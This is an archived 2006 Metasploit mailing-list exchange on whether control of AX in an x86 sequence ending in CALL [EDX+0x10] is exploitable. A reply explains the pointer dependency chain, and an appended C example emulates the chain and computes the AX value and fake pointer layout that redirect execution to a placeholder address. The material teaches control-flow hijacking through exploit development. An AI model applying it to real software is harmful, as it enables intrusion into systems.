Metasploit mailing list archives

exploitable???


From: sargoniv at gmail.com (John Sprocket)
Date: Thu, 22 Jun 2006 18:03:59 -0400

whenever you look at something like this to see if it's exploitable you can usually see a dependency chain. to summarize: yes, it's exploitable. would it be a pain in the ass? yea, prolly.
so your goal is to execute code of your choice via a function pointer.

let's be backwardz:
1B0114A3   FF52 10          CALL DWORD PTR DS:[EDX+10]
1B0114A1   8B11             MOV EDX,DWORD PTR DS:[ECX]
1B01149A   8B8C87 B0000000  MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B011497   0FBFC0           MOVSX EAX,AX

let's summarize whatcha got:
your goal == calling [edx+0x10].
edx depends on the value at [ecx]
ecx then depends on the value at [edi + eax*4 + 0xb0]
and you control some of eax.
our primary variable here is edi which probably gets allocated somewhere.

so at the poc [point-of-crash] of your process, you're prolly gonna want to know the state of your regs, mainly edi. see what address edi was allocated at, then add 0xb0 to it.
now at 0x1b0114a1 it gets dereferenced again. so look around for a location where eax points to an address that points to code that you control, then subtract 10 and you're good to go.

after you've got that down, then comes figuring out a way to make it "reliable". that's the exciting^W"fun" part. :)

.sargoniv



skape's shit looks like it will rock btw.
http://metasploit.blogspot.com/2006/04/interprocedural-data-flow-dependencies.html#links




----pardon this archive paste---
Subject: [framework] exploitable???
From: <arahzone-msf[at]yahoo.com>
Date: Thu, 22 Jun 2006 14:24:14 -0700 (PDT)
Reply-to: framework[at]metasploit.com

________________________________
Hi,

I am controlling AX in the code below but I don't know how to exploit it. Is this exploitable?

1B011497   0FBFC0           MOVSX EAX,AX
1B01149A   8B8C87 B0000000  MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B0114A1   8B11             MOV EDX,DWORD PTR DS:[ECX]
1B0114A3   FF52 10          CALL DWORD PTR DS:[EDX+10]

Thanks in advance


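The dependency chain sargoniv walks through above, as an added worked example in C (not code from either poster): a small emulator of the four instructions over a flat 32-bit memory image, plus the inverse calculation of the AX value that makes the first load hit a dword slot we control. Every address here is constructed for the example (EDI at 0x00410000 at the point of crash, a controlled buffer at 0x00408000, 0x41414141 standing in for the payload address). It also checks the two constraints the MOVSX and scale-by-4 addressing impose: the slot must sit at a 4-byte-aligned distance from edi+0xb0, and inside the signed 16-bit index window (±32768 dwords, i.e. ±128 KiB), which is why a buffer *below* edi is still reachable with a "negative" AX.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Constructed 32-bit address space: a flat byte image mapped at IMG_BASE. */
#define IMG_BASE 0x00400000u
#define IMG_SIZE 0x00020000u            /* 128 KiB */
static uint8_t img[IMG_SIZE];

static bool in_img(uint32_t va, uint32_t len) {
    return va >= IMG_BASE && va - IMG_BASE + len <= IMG_SIZE;
}
static uint32_t rd32(uint32_t va) {
    if (!in_img(va, 4)) return 0xDEADDEADu;   /* unmapped read: would fault */
    uint32_t v; memcpy(&v, img + (va - IMG_BASE), 4); return v;
}
static void wr32(uint32_t va, uint32_t v) {
    if (in_img(va, 4)) memcpy(img + (va - IMG_BASE), &v, 4);
}

/* Emulate the chain from the disassembly:
 *   MOVSX EAX,AX ; MOV ECX,[EDI+EAX*4+0xB0] ; MOV EDX,[ECX] ; CALL [EDX+0x10]
 * and return the address the CALL would transfer to. */
static uint32_t call_target(uint32_t edi, uint16_t ax) {
    int32_t eax = (int16_t)ax;                  /* MOVSX: AX is sign-extended */
    uint32_t ecx = rd32(edi + (uint32_t)eax * 4 + 0xB0);   /* wraps like x86 */
    uint32_t edx = rd32(ecx);
    return rd32(edx + 0x10);
}

/* Inverse: given EDI at the crash and the address of a dword slot we
 * control, compute the AX that makes the first load read that slot.
 * Fails if the slot is misaligned relative to edi+0xb0 or lies outside
 * the int16 index range that MOVSX EAX,AX can produce. */
static bool solve_ax(uint32_t edi, uint32_t slot, uint16_t *ax_out) {
    int64_t delta = (int64_t)slot - (int64_t)(edi + 0xB0);
    if (delta % 4 != 0) return false;
    int64_t idx = delta / 4;
    if (idx < INT16_MIN || idx > INT16_MAX) return false;
    *ax_out = (uint16_t)(int16_t)idx;
    return true;
}

/* Lay out a 12-byte fake pointer chain at buf (memory we control) so the
 * CALL lands on `payload`, following the "subtract 0x10" trick: EDX is
 * pointed 0x10 bytes *before* the slot holding the payload address. */
static bool build_chain(uint32_t edi, uint32_t buf, uint32_t payload, uint16_t *ax) {
    uint32_t slot      = buf;        /* [edi+eax*4+0xb0] reads this -> ecx */
    uint32_t fake_obj  = buf + 4;    /* ecx; [ecx] -> edx                  */
    uint32_t code_slot = buf + 8;    /* [edx+0x10] reads this -> target    */
    wr32(slot, fake_obj);
    wr32(fake_obj, code_slot - 0x10);
    wr32(code_slot, payload);
    return solve_ax(edi, slot, ax);
}

int main(void) {
    uint16_t ax;
    if (!build_chain(0x00410000u, 0x00408000u, 0x41414141u, &ax)) return 1;
    printf("send AX=0x%04X -> CALL target 0x%08X\n",
           ax, call_target(0x00410000u, ax));
    return 0;
}
```

With the constructed addresses the controlled buffer sits 0x80b0 bytes below edi+0xb0, so the required index is -8236 and AX comes out as 0xDFD4; feeding a 16-bit value with the top bit set is exactly what the sign extension buys you. In a real target the values of EDI and of the controlled buffer come from the debugger at the crash, and whether they stay put across runs is the "reliable" part sargoniv refers to.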
